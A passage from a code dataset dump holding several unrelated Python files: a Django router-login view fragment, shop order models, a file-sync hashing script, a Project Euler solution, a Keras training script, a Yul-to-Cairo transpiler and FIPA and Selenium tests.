router_pass,\n\t\t\t}\n\n\t\tpost_data = {\n\t\t\t'username': router_username,\n\t\t\t'password': router_pass,\n\t\t\t}\n\n\t\treq = urllib2.Request(router_address, data=post_data)\n\n\t\ttry:\n\t\t\tcont = urllib2.urlopen(req)\n\t\texcept urllib2.URLError as e:\n\t\t\terror_data = { \n\t\t\t\t'e_code': e.reason[0],\n\t\t\t\t'e_reason': e.reason[1],\n\t\t\t}\n\n\t\treturn HttpResponse(\n\t\t\tjson.dumps(error_data),\n\t\t\tcontent_type=\"application/json\"\n\t\t\t)\n\telse:\n\t\treturn HttpResponse(\n\t\t\tjson.dumps({\"nothing to see\": \"this isn't happening\"}),\n\t\t\tcontent_type=\"application/json\"\n\t\t)\n","sub_path":"banners/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"568327641","text":"from django.db import models\n\n\nclass Order(models.Model):\n FORMING = 'FM'\n SENT_TO_PROCEED = 'STP'\n PROCEEDED = 'PRD'\n PAID = 'PD'\n READY = 'RDY'\n CANCEL = 'CNC'\n\n 
ORDER_STATUS_CHOICES = (\n        (FORMING, 'формируется'),\n        (SENT_TO_PROCEED, 'отправлен в обработку'),\n        (PAID, 'оплачен'),\n        (PROCEEDED, 'обрабатывается'),\n        (READY, 'готов к выдаче'),\n        (CANCEL, 'отменен'),\n    )\n\n    user = models.ForeignKey(\n        'customers.Customer',\n        on_delete=models.CASCADE\n    )\n\n    created = models.DateTimeField(\n        auto_now_add=True\n    )\n    modified = models.DateTimeField(\n        auto_now=True\n    )\n    status = models.CharField(\n        max_length=3,\n        choices=ORDER_STATUS_CHOICES,\n        default=FORMING\n    )\n    is_active = models.BooleanField(\n        default=True,\n        db_index=True,\n    )\n\n    def get_total_quantity(self):\n        # total quantity of products in the order\n        items = self.items.select_related()\n        return sum(list(map(lambda item: item.quantity, items)))\n\n    def get_product_type_quantity(self):\n        # number of unique products\n        items = self.items.select_related()\n        return len(items)\n\n    def get_order_price(self):\n        # total cost of the whole order\n        items = self.items.select_related('product')\n        return sum(list(map(lambda item: item.get_order_item_price, items)))\n\n    def delete(self):\n        # delete the order, returning its product quantities back to stock\n        for item in self.items.select_related():\n            item.product.quantity += item.quantity\n            item.product.save()\n        self.is_active = False\n        self.status = 'CNC'\n        self.save()\n\n    # def save(self, *args, **kwargs):\n    #     # check whether we are editing an already existing order\n    #     if self.pk:\n    #         self.product.quantity -= self.quantity - self.__class__.objects.get(id=self.pk).quantity\n    #     else:\n    #         self.product.quantity -= self.quantity\n\n    def __str__(self):\n        full_name = self.user.get_full_name()\n        username = full_name if full_name else self.user.username\n        return f'{username}, order: {self.id}, created: {self.created.strftime(\"%Y-%m-%d %H:%M\")}'\n\n    def __repr__(self):\n        full_name = self.user.get_full_name()\n        username = full_name if full_name else self.user.username\n        return f'{username}, order: {self.id}, created: {self.created.strftime(\"%Y-%m-%d %H:%M\")}'\n\n\nclass OrderItemQueryset(models.QuerySet):\n\n    def delete(self, *args, **kwargs):\n        for object in self:\n            object.product.quantity += object.quantity\n            object.product.save()\n        super(OrderItemQueryset, self).delete(*args, **kwargs)\n\n\nclass OrderItem(models.Model):\n    objects = OrderItemQueryset.as_manager()\n    order = models.ForeignKey(\n        Order,\n        on_delete=models.CASCADE,\n        related_name='items'\n    )\n\n    product = models.ForeignKey(\n        'products.Product',\n        on_delete=models.CASCADE\n    )\n\n    quantity = models.PositiveIntegerField()\n\n    @property\n    def get_order_item_price(self):\n        # cost of this order line\n        return self.product.now_price * self.quantity\n\n    def delete(self, using=None, keep_parents=False):\n        # when an item is deleted, its quantity is returned to stock\n        self.product.quantity += self.quantity\n        self.product.save()\n        super(self.__class__, self).delete()\n\n    def save(self, *args, **kwargs):\n        # check whether we are editing an already existing order\n        if self.pk:\n            self.product.quantity -= self.quantity - self.__class__.objects.get(id=self.pk).quantity\n        else:\n            self.product.quantity -= self.quantity\n        self.product.save()\n        super(self.__class__, self).save(*args, **kwargs)\n\n    def __str__(self):\n        return self.product.name + '_orderitem'\n","sub_path":"myshop/ordersapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"531290687","text":"import time\nfrom datetime import datetime\nimport 
os\nimport hashlib\nimport json\n\n\"\"\"\nCreate and update sync file in given directory\n\nAuthor: Hayden Knowles\n\"\"\"\n\ndef get_hash(file_name):\t\t\t\t# SHA-256 hash function\n with open(file_name, 'rb') as f:\n m = hashlib.sha256()\n m.update(f.read())\n sha = m.hexdigest()\n return sha\n\ndef update_sync(directory):\n\t# get list of files in directories\n\tfiles1 = os.listdir(directory)\n\n\tif '.sync' in os.listdir(directory):\t\t\t# find sync file if it exists and open\n\t\twith open(directory + '.sync') as data:\n\t\t\tdictionary = json.load(data)\n\telse:\n\t\tdictionary = {}\n\t\topen(directory + '.sync', 'x')\t# create new sync file if none exists\n\n\tfor file_name in files1:\t\t\t\t\t# loop through files and update or append to dictionary\n\t\tif os.path.isfile(directory + file_name) and file_name != '.sync':\n\t\t\tif file_name not in dictionary:\t\t# add entry if file does not exist in sync file\n\t\t\t\tdictionary[file_name] = []\n\t\t\t\tdictionary[file_name].append([time.strftime(\"%Y-%m-%d %H:%M:%S %z\", time.localtime(os.path.getmtime(directory + file_name))), get_hash(directory + file_name)])\n\t\t\telse:\n\t\t\t\titem = dictionary[file_name][0]\n\t\t\t\tif get_hash(directory + file_name) == item[1]:\n\t\t\t\t\tcurr_file = datetime.fromtimestamp(time.mktime(time.localtime(os.path.getmtime(directory + file_name))))\n\t\t\t\t\titem_date = datetime.fromtimestamp(time.mktime(time.strptime(item[0], '%Y-%m-%d %H:%M:%S %z')))\n\t\t\t\t\tif curr_file != item_date:\n\t\t\t\t\t\tmtime = time.mktime(item_date.timetuple()) + item_date.microsecond / 1E6\n\t\t\t\t\t\tos.utime(directory + file_name, (mtime, mtime))\n\t\t\t\telse:\n\t\t\t\t\t# add new entry if file has been changed\n\t\t\t\t\tdictionary[file_name].insert(0, [time.strftime('%Y-%m-%d %H:%M:%S %z', time.localtime(os.path.getmtime(directory + file_name))), get_hash(directory + file_name)])\n\t\telif os.path.isdir(directory + file_name):\t\t# a directory\n\t\t\tupdate_sync(directory + file_name + '/')\n\tfor item in dictionary:\n\t\tif item not in files1:\n\t\t\tdictionary[item][0][1] = \"deleted\"\n\tprint(directory)\n\tprint(dictionary)\n\tsync = open(directory + '.sync', 'w')\n\t# write changes to json file:\n\tjson.dump(dictionary, sync, indent=4)","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460874560","text":"\"\"\"\nProject Euler 46:It was proposed by Christian Goldbach that every odd composite number can be written as the sum of a prime and twice a square.\n\n9 = 7 + 2×1^2\n15 = 7 + 2×2^2\n21 = 3 + 2×3^2\n25 = 7 + 2×3^2\n27 = 19 + 2×2^2\n33 = 31 + 2×1^2\n\nIt turns out that the conjecture was false.\n\nWhat is the smallest odd composite that cannot be written as the sum of a prime and twice a square\n\n\n\"\"\"\n\ndef run():\n \n n = 5\n f = 1\n primes = set()\n\n while True:\n if all(n % p for p in primes):\n primes.add(n)\n else:\n if not any((n-2*i*i) in primes for i in range(1, n)):\n break\n n += 3-f\n f = -f\n\n print(\"the smallest odd composite that cannot be written as the sum of a prime and twice a square =\",n)\nif __name__ == '__main__':\n\trun()\n","sub_path":"euler/046.py","file_name":"046.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31072355","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Speciallan\n\nimport keras\nfrom keras.models 
import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D, GlobalAvgPool2D, GlobalAveragePooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense,Input\nfrom keras.optimizers import SGD\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.applications import VGG16, ResNet50, InceptionV3\nfrom keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nimport numpy as np\nfrom keras import backend as K\nfrom keras.models import Model\nfrom keras.callbacks import EarlyStopping\nfrom keras.models import load_model\nfrom data_loader import build_generator, generator\nfrom model_builder import build_bcnn\n\n\nK.set_image_dim_ordering('tf')\n\nWEIGHTS_PATH = 'vgg16_weights_tf_dim_ordering_tf_kernels.h5'\nWEIGHTS_PATH_NO_TOP = 'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5'\n# img_width, img_height = 200,200\n# img_width, img_height = 224,224\nimg_width, img_height = 224,224\nnum_classes = 3\n\nmodel = build_bcnn(\n all_trainable=True,\n size_height=img_height,\n size_width=img_width,\n no_class=num_classes,\n # learning_rate=1e-3,\n learning_rate=1.0,\n decay_learning_rate=0.1,\n decay_weight_rate=1e-8\n)\n\n# model.load_weights('./model/cloth_bcnn.h5')\n\ntrain_data_dir = '../../data/cloth/splitted/train'\nvalid_data_dir = '../../data/cloth/splitted/valid'\nnb_train_samples = 25712\nnb_validation_samples = 6428\nepochs = 10\nbatch_size = 32\nclasses = ['01', '02', '99']\n\n# train_generator, valid_generator = build_generator(\n# train_dir=train_data_dir,\n# valid_dir=validation_data_dir,\n# target_size=(img_height, img_width),\n# batch_size=batch_size)\n\ntrain_generator = generator(train_data_dir, classes=classes, batch_size=batch_size, target_size=(img_height, img_width))\nvalid_generator = generator(valid_data_dir, classes=classes, batch_size=batch_size, target_size=(img_height, img_width))\n\n# (16, 224, 224, 3) , (16, 3)\n\n# t = next(train_generator)\n# print(t[0].shape, t[1].shape)\n# exit()\n\npath_model = './model/cloth_bcnn_'\ncallack_saver = keras.callbacks.ModelCheckpoint(\n path_model\n + \"e_{epoch:02d}\"\n + \"_loss_{val_loss:.3f}\"\n + \"_acc_{val_acc:.3f}\"\n + \".h5\"\n , monitor='val_loss'\n , verbose=0\n , mode='auto'\n , period=1\n , save_best_only=True\n )\ncallback_reducer = keras.callbacks.ReduceLROnPlateau(\n monitor='val_loss'\n , factor=0.1\n , min_lr=1e-6\n , min_delta=1e-3\n , patience=5\n )\ncallback_stopper = keras.callbacks.EarlyStopping(\n monitor='val_loss'\n , min_delta=1e-3\n , patience=5\n , verbose=0\n , mode='auto'\n )\nlist_callback = [\n callack_saver\n ,callback_reducer\n # ,callback_stopper\n]\n\n\n\nmodel.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples // batch_size,\n epochs=epochs,\n validation_data=valid_generator,\n validation_steps=nb_validation_samples // batch_size,\n callbacks=list_callback)\n\nmodel.save_weights('model/cloth_bcnn.h5')\n\n\n","sub_path":"cloth_bcnn_train.py","file_name":"cloth_bcnn_train.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"436659930","text":"import matplotlib.pyplot as plt\r\nimport networkx as nx\r\n\r\n\r\nclass Graph:\r\n def __init__(self):\r\n self.edges = []\r\n self.names = []\r\n\r\n def addEdge(self, a, b, name):\r\n self.edges.append([a, b])\r\n self.names.append(((a, b), name))\r\n\r\n def visualize(self):\r\n G = nx.DiGraph()\r\n G.add_edges_from(self.edges)\r\n pos = 
nx.spring_layout(G)\r\n\r\n plt.figure()\r\n\r\n nx.draw(G, pos, edge_color='black', width=1, linewidths=1, node_size=600,node_color='green', alpha=0.9, labels={node: node for node in G.nodes()})\r\n\r\n nx.draw_networkx_edge_labels(G, pos, edge_labels=dict(self.names), font_color='red' )\r\n plt.axis('off')\r\n plt.show()\r\n\r\n def print_name(self):\r\n print(self.names)\r\n\r\n\r\nG = Graph()\r\n\r\nn, m = [int(x) for x in input().split()]\r\n\r\n# print(n,m)\r\n\r\nfor i in range(0, m):\r\n x, y = [int(p) for p in input().split()]\r\n G.addEdge(x, y, \"x\")\r\n# G.print_name()\r\nG.visualize()\r\n","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39142890","text":"# 1. The Python type for storing true and false values is called Boolean\n# (2 == 3, 5 == 5, 7 < 8)\n\n# 2. A flow chart is a kind of diagram that represents an algorithm or a process,\n# showing the steps of the work as different kinds of boxes\n# in an order indicated by arrows.\n\n# 3. A nested conditional is an if…elif…else structure\n# placed inside another if…elif…else structure\n\n# e.g.:\nx = 10\ny = 10\n\nif x < y:\n print(\"x is less than y\")\nelse:\n if x > y:\n print(\"x is greater than y\")\n else:\n print(\"x and y must be equal\")\n","sub_path":"session2/answer_questions.py","file_name":"answer_questions.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"621571757","text":"from __future__ import annotations\n\nfrom collections import defaultdict\nfrom typing import Optional\n\nimport solcx\nfrom starkware.cairo.lang.compiler.parser import parse_file\n\nimport yul.yul_ast as ast\nfrom transpiler.Imports import merge_imports, UINT256_MODULE, format_imports\nfrom yul.BuiltinHandler import YUL_BUILTINS_MAP\nfrom yul.utils import STORAGE_DECLS\nfrom yul.yul_ast import AstVisitor\n\nUINT128_BOUND = 2 ** 128\n\nCOMMON_IMPORTS = {\n \"starkware.cairo.common.registers\": {\"get_fp_and_pc\"},\n \"starkware.cairo.common.dict_access\": {\"DictAccess\"},\n \"starkware.cairo.common.math_cmp\": {\"is_le\"},\n \"starkware.cairo.common.default_dict\": {\n \"default_dict_new\",\n },\n \"starkware.cairo.common.uint256\": {\"Uint256\", \"uint256_eq\"},\n \"starkware.cairo.common.cairo_builtins\": {\"HashBuiltin\"},\n \"starkware.starknet.common.storage\": {\"Storage\"},\n \"evm.utils\": {\"update_msize\"},\n}\n\n# TODO we should analyze the tree rather than rely on textual presentation\nDISCARD = \"\"\" assert 0 = 1\n return ()\"\"\"\n\nMAIN_PREAMBLE = \"\"\"%lang starknet\n%builtins pedersen range_check\n\"\"\"\n\n\nclass ToCairoVisitor(AstVisitor):\n def __init__(self, sol_source: str):\n super().__init__()\n self.preamble: bool = False\n self.n_names: int = 0\n self.solc_version: float = self.get_source_version(sol_source)\n self.validate_solc_ver()\n self.public_functions = self.get_public_functions(sol_source)\n self.imports = defaultdict(set)\n self.discarded_warp_blocks: list[str] = []\n merge_imports(self.imports, COMMON_IMPORTS)\n self.last_function: Optional[ast.FunctionDefinition] = None\n\n def get_source_version(self, sol_source: str) -> float:\n code_split = sol_source.split(\"\\n\")\n for line in code_split:\n if \"pragma\" in line:\n ver: float = float(line[line.index(\"0.\") + 2 :].replace(\";\", \"\"))\n if ver < 8.0:\n raise Exception(\n \"Please use a version of 
solidity that is at least 0.8.0\"\n )\n return ver\n raise Exception(\"No Solidity version specified in contract\")\n\n def check_installed_solc(self, source_version: float) -> str:\n solc_vers = solcx.get_installed_solc_versions()\n vers_clean = []\n src_ver = \"0.\" + str(source_version)\n for ver in solc_vers:\n vers_clean.append(\".\".join(str(x) for x in list(ver.precedence_key)[:3]))\n if src_ver not in vers_clean:\n solcx.install_solc(src_ver)\n return src_ver\n\n def validate_solc_ver(self):\n src_ver: str = self.check_installed_solc(self.solc_version)\n solcx.set_solc_version(src_ver)\n\n def get_public_functions(self, sol_source: str) -> list[str]:\n public_functions = set()\n abi = solcx.compile_source(sol_source, output_values=[\"hashes\"])\n for value in abi.values():\n for v in value[\"hashes\"]:\n public_functions.add(f\"fun_{v[:v.find('(')]}\")\n return list(public_functions)\n\n def translate(self, node: ast.Node) -> str:\n main_part = self.print(node)\n return \"\\n\".join(\n [\n MAIN_PREAMBLE,\n format_imports(self.imports),\n STORAGE_DECLS,\n main_part,\n ]\n )\n\n def print(self, node: ast.Node, *args, **kwargs) -> str:\n return self.visit(node, *args, **kwargs)\n\n def common_visit(self, node: ast.Node, *args, **kwargs):\n raise AssertionError(\n f\"Each node type should have a custom visit, but {type(node)} doesn't\"\n )\n\n def visit_typed_name(self, node: ast.TypedName, split: bool = False) -> str:\n if not split:\n return f\"{node.name} : {node.type}\"\n assert node.type == \"Uint256\", \"Can't split non Uin256 type\"\n # could have added \": felt\", but when a type is omitted, it's felt by default\n return f\"{node.name}_low, {node.name}_high\"\n\n def visit_literal(self, node: ast.Literal) -> str:\n v = int(node.value) # to convert bools: True -> 1, False -> 0\n high, low = divmod(v, UINT128_BOUND)\n return f\"Uint256(low={low}, high={high})\"\n\n def visit_identifier(self, node: ast.Identifier) -> str:\n return f\"{node.name}\"\n\n def generate_ids_typed(self, variable_names, function_name: str = \"\"):\n variables = []\n for var in variable_names:\n var_repr = self.print(var)\n if \"Uint256\" not in var_repr:\n var_repr += \": Uint256\"\n variables.append(var_repr)\n return \", \".join(\"local \" + x for x in variables)\n\n def remove_checked(self, args_repr: str, function_name: str) -> str:\n if \"checked_add\" in function_name:\n return f\"u256_add({args_repr})\"\n elif \"checked_sub\" in function_name:\n return f\"uint256_sub({args_repr})\"\n elif \"revert\" in function_name:\n return f\"assert 0 = 1\"\n else:\n return f\"{function_name}({args_repr})\"\n\n def visit_assignment(self, node: ast.Assignment) -> str:\n self.preamble = False\n value_repr: str = self.print(node.value)\n if isinstance(node.value, ast.FunctionCall):\n function_name = node.value.function_name.name\n function_args: str = \", \".join(self.print(x) for x in node.value.arguments)\n ids_repr: str = self.generate_ids_typed(node.variable_names, function_name)\n self.preamble = True\n if function_name in YUL_BUILTINS_MAP.keys():\n builtin_to_cairo = YUL_BUILTINS_MAP[function_name](function_args)\n merge_imports(self.imports, builtin_to_cairo.required_imports())\n if not node.variable_names:\n return builtin_to_cairo.generated_cairo\n else:\n return f\"\"\"{builtin_to_cairo.preamble}\nlet ({ids_repr}) = {builtin_to_cairo.function_call}\n{builtin_to_cairo.ref_copy}\"\"\"\n else:\n call = self.remove_checked(function_args, function_name)\n if not node.variable_names:\n return value_repr\n 
else:\n ids_repr: str = \", \".join(\n self.print(x) for x in node.variable_names\n )\n if function_name in self.public_functions:\n ids_repr_felt = self.to_high_low_felt(ids_repr)\n return f\"let ({ids_repr_felt}) = {call}\\n\" + self.init_u256(\n ids_repr\n )\n else:\n return f\"let ({ids_repr}) = {call}\\n\"\n\n else:\n ids_repr: str = self.generate_ids_typed(node.variable_names)\n self.preamble = True\n return f\"{ids_repr} = {value_repr}\"\n\n def visit_function_call(self, node: ast.FunctionCall) -> str:\n fun_repr = self.print(node.function_name)\n args_repr = \", \".join(self.print(x) for x in node.arguments)\n if fun_repr in self.public_functions:\n args_repr = self.to_high_low_felt(args_repr)\n if fun_repr == \"revert\":\n return \"assert 0 = 1\"\n elif fun_repr.startswith(\"checked_add\"):\n merge_imports(self.imports, {\"evm.uint256\": {\"u256_add\"}})\n return f\"u256_add({args_repr})\"\n elif fun_repr.startswith(\"checked_sub\"):\n merge_imports(self.imports, {UINT256_MODULE: {\"uint256_sub\"}})\n return f\"uint256_sub({args_repr})\"\n elif fun_repr in self.discarded_warp_blocks or \"panic_error\" in fun_repr:\n return \"assert 0 = 1\"\n elif fun_repr in YUL_BUILTINS_MAP.keys():\n builtin_to_cairo = YUL_BUILTINS_MAP[fun_repr](args_repr)\n merge_imports(self.imports, builtin_to_cairo.required_imports())\n if self.preamble:\n return f\"\"\"{builtin_to_cairo.preamble}\n{builtin_to_cairo.function_call}\n{builtin_to_cairo.ref_copy}\"\"\"\n else:\n return f\"{builtin_to_cairo.function_call}\"\n else:\n return f\"{fun_repr}({args_repr})\"\n\n def visit_expression_statement(self, node: ast.ExpressionStatement) -> str:\n if isinstance(node.expression, ast.FunctionCall):\n return self.visit(node.expression)\n else:\n # see ast.ExpressionStatement docstring\n raise ValueError(\"What am I going to do with it? 
Why is it here?..\")\n\n def visit_variable_declaration(self, node: ast.VariableDeclaration) -> str:\n self.preamble = False\n if node.value is None:\n decls_repr = \"\\n\".join(\n self.print(ast.VariableDeclaration(variables=[x], value=ast.Literal(0)))\n for x in node.variables\n )\n self.preamble = True\n return decls_repr\n value_repr = self.print(node.value)\n if isinstance(node.value, ast.FunctionCall):\n function_name: str = node.value.function_name.name\n function_args: str = \", \".join(self.print(x) for x in node.value.arguments)\n func_call: str = self.print(node.value)\n vars_repr = self.generate_ids_typed(node.variables, function_name)\n if function_name in YUL_BUILTINS_MAP:\n builtin_to_cairo = YUL_BUILTINS_MAP[function_name](function_args)\n merge_imports(self.imports, builtin_to_cairo.required_imports())\n self.preamble = True\n if not node.variables:\n return builtin_to_cairo.generated_cairo\n else:\n return f\"\"\"{builtin_to_cairo.preamble}\nlet ({vars_repr}) = {builtin_to_cairo.function_call}\n{builtin_to_cairo.ref_copy}\"\"\"\n else:\n if not node.variables:\n return value_repr\n else:\n if function_name in self.public_functions:\n vars_repr_felt = self.to_high_low_felt(vars_repr)\n return (\n f\"let ({vars_repr_felt}) = {function_name}({self.to_high_low_felt(function_args)})\\n\"\n + self.init_u256(vars_repr)\n )\n elif \"mapping_index\" in function_name:\n return f\"\"\"let ({vars_repr}) = {function_name}({function_args})\nlocal range_check_ptr = range_check_ptr\nlocal memory_dict : DictAccess* = memory_dict\nlocal msize = msize\"\"\"\n else:\n return f\"let ({vars_repr}) = {func_call}\"\n\n else:\n self.preamble = True\n vars_repr = self.generate_ids_typed(node.variables)\n return f\"{vars_repr} = {value_repr}\"\n\n def visit_block(self, node: ast.Block) -> str:\n return \"\\n\".join(self.print(x) for x in node.statements)\n\n def to_high_low_felt(self, vars: str) -> str:\n if vars != \"\":\n vars = vars.replace(\" : Uint256\", \"\")\n vars = vars.split(\",\")\n params_repr = \", \".join(f\"{p.strip()}_low, {p.strip()}_high\" for p in vars)\n return params_repr\n else:\n return vars\n\n def init_u256(self, params_repr: str) -> str:\n params = params_repr.replace(\" : Uint256\", \"\")\n params = params.split(\",\")\n declr_str = \"\"\n for p in params:\n if \"local\" in p:\n p_no_local = p.replace(\"local\", \"\").strip()\n declr_str += (\n f\"{p}: Uint256 = Uint256({p_no_local}_low, {p_no_local}_high)\\n\"\n )\n else:\n declr_str += f\"local {p}: Uint256 = Uint256({p}_low, {p}_high)\\n\"\n return declr_str\n\n def visit_function_definition(self, node: ast.FunctionDefinition):\n self.last_function = node\n taboos = [\"abi_\", \"checked_\", \"getter_\", \"panic_error\"]\n if any(taboo in node.name for taboo in taboos):\n return \"\"\n external = node.name in self.public_functions\n params_repr = \", \".join(self.print(x, split=external) for x in node.parameters)\n returns_repr = \", \".join(\n self.print(x, split=external) for x in node.return_variables\n )\n body_repr = self.print(node.body)\n external_function: str = \"\"\n if external:\n combine_split_params = \"\\n\".join(\n f\"local {x.name}: Uint256 = Uint256({x.name}_low, {x.name}_high)\"\n for x in node.parameters\n )\n body_repr = combine_split_params + \"\\n\" + body_repr\n external_function: str = (\n f\"@external\\n\"\n f\"func {node.name}_external({params_repr}) -> ({returns_repr}):\\n\"\n f\"alloc_locals\\n\"\n f\"let (local memory_dict: DictAccess*) = default_dict_new(0)\\n\"\n f\"tempvar msize = 
0\\n\"\n f\"return {node.name}{{msize=msize, memory_dict=memory_dict}}\"\n f\" ({params_repr})\\n\"\n f\"end\\n\\n\"\n )\n\n func = (\n f\"{external_function}\"\n f\"func {node.name}\"\n f\"{{range_check_ptr, pedersen_ptr: HashBuiltin*\"\n f\", storage_ptr: Storage*, memory_dict: DictAccess*, msize}}\"\n f\"({params_repr}) -> ({returns_repr}):\\n\"\n f\"alloc_locals\\n\"\n f\"{body_repr}\\n\"\n f\"end\\n\"\n )\n func = parse_file(func).format()\n\n if (\"__warp_block\" in node.name) and (DISCARD in func):\n self.discarded_warp_blocks.append(node.name)\n return \"\"\n else:\n return func\n\n def visit_if(self, node: ast.If) -> str:\n cond_repr = self.print(node.condition)\n body_repr = self.print(node.body)\n else_repr = \"\"\n if node.else_body:\n else_repr = f\"else:\\n\\t{self.print(node.else_body)}\\n\"\n return (\n f\"if {cond_repr}.low + {cond_repr}.high != 0:\\n\"\n f\"\\t{body_repr}\\n\"\n f\"{else_repr}\"\n f\"end\"\n )\n\n def visit_case(self, node: ast.Case):\n return AssertionError(\"There should be no cases, run SwitchToIfVisitor first\")\n\n def visit_switch(self, node: ast.Switch):\n return AssertionError(\n \"There should be no switches, run SwitchToIfVisitor first\"\n )\n\n def visit_for_loop(self, node: ast.ForLoop):\n raise AssertionError(\n \"There should be no for loops, run ForLoopEliminator first\"\n )\n\n def visit_break(self, node: ast.Break):\n raise AssertionError(\"There should be no breaks, run ForLoopEliminator first\")\n\n def visit_continue(self, node: ast.Continue):\n raise AssertionError(\n \"There should be no continues, run ForLoopEliminator first\"\n )\n\n def visit_leave(self, node: ast.Leave) -> str:\n return_names = \", \".join(x.name for x in self.last_function.return_variables)\n return f\"return ({return_names})\"\n","sub_path":"warp/yul/ToCairoVisitor.py","file_name":"ToCairoVisitor.py","file_ext":"py","file_size_in_byte":15017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461258983","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\n\"\"\"This module contains the tests for the FIPA protocol.\"\"\"\nimport base64\nimport json\n\nfrom aea.mail.base import Envelope\nfrom aea.protocols.fipa.message import FIPAMessage\nfrom aea.protocols.fipa.serialization import FIPASerializer\nfrom aea.protocols.oef.models import Description\n\n\ndef test_fipa_cfp_serialization():\n \"\"\"Test that the serialization for the 'fipa' protocol works.\"\"\"\n query = base64.b64encode(json.dumps({\"foo\": \"bar\"}).encode(\"utf-8\"))\n msg = FIPAMessage(message_id=0, dialogue_id=0, target=0, performative=FIPAMessage.Performative.CFP, query=query)\n msg_bytes = FIPASerializer().encode(msg)\n envelope = Envelope(to=\"receiver\", sender=\"sender\", 
protocol_id=FIPAMessage.protocol_id, message=msg_bytes)\n envelope_bytes = envelope.encode()\n\n actual_envelope = Envelope.decode(envelope_bytes)\n expected_envelope = envelope\n assert expected_envelope == actual_envelope\n\n actual_msg = FIPASerializer().decode(actual_envelope.message)\n expected_msg = msg\n assert expected_msg == actual_msg\n\n\ndef test_fipa_propose_serialization():\n \"\"\"Test that the serialization for the 'fipa' protocol works.\"\"\"\n proposal = [\n Description({\"foo1\": 1, \"bar1\": 2}), # DataModel(\"dm_bar\", [AttributeSchema(\"foo1\", int, True), AttributeSchema(\"bar1\", int, True)]))\n Description({\"foo2\": 1, \"bar2\": 2}),\n ]\n msg = FIPAMessage(message_id=0, dialogue_id=0, target=0, performative=FIPAMessage.Performative.PROPOSE, proposal=proposal)\n msg_bytes = FIPASerializer().encode(msg)\n envelope = Envelope(to=\"receiver\", sender=\"sender\", protocol_id=FIPAMessage.protocol_id, message=msg_bytes)\n envelope_bytes = envelope.encode()\n\n actual_envelope = Envelope.decode(envelope_bytes)\n expected_envelope = envelope\n assert expected_envelope == actual_envelope\n\n actual_msg = FIPASerializer().decode(actual_envelope.message)\n expected_msg = msg\n\n p1 = actual_msg.get(\"proposal\")\n p2 = expected_msg.get(\"proposal\")\n assert p1[0].values == p2[0].values\n assert p1[1].values == p2[1].values\n","sub_path":"tests/test_protocols/test_fipa.py","file_name":"test_fipa.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"265395511","text":"import pytest\nimport time\n\nfrom pages.product_page import ProductPage\nfrom pages.cart_page import CartPage\nfrom pages.login_page import LoginPage\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209/?promo=newYear\"\n\n\nclass TestUserAddToCartFromProductPage(object):\n @pytest.mark.need_review\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self, browser):\n email = str(time.time()) + \"@fakemail.org\"\n password = str(time.time())\n login_page = LoginPage(browser, link)\n login_page.open()\n login_page.go_to_login_page()\n login_page.register_new_user(email, password)\n login_page.should_be_authorized_user()\n\n @pytest.mark.need_review\n def test_user_can_add_product_to_cart(self, browser):\n page = ProductPage(browser, link)\n page.open()\n page.add_to_backet()\n page.solve_quiz_and_get_code()\n page.should_be_message_about_adding()\n page.should_be_message_basket_total()\n\n def test_user_cant_see_success_message(self, browser):\n page = ProductPage(browser, link)\n page.open()\n page.should_not_be_success_message()\n\n\ndef test_guest_should_see_login_link_on_product_page(browser):\n page = ProductPage(browser, link)\n page.open()\n page.should_be_login_link()\n\n\n@pytest.mark.need_review\ndef test_guest_can_add_product_to_cart(browser):\n page = ProductPage(browser, link)\n page.open()\n page.add_to_backet()\n page.solve_quiz_and_get_code()\n page.should_be_message_about_adding()\n page.should_be_message_basket_total()\n\n\ndef test_guest_cant_see_success_message_after_adding_product_to_cart(browser):\n page = ProductPage(browser, link)\n page.open()\n page.add_to_backet()\n page.should_not_be_success_message()\n\n\ndef test_guest_cant_see_success_message(browser):\n page = ProductPage(browser, link)\n page.open()\n page.should_not_be_success_message()\n\n\ndef test_message_dissapeared_after_adding_product_to_cart(browser):\n page = ProductPage(browser, 
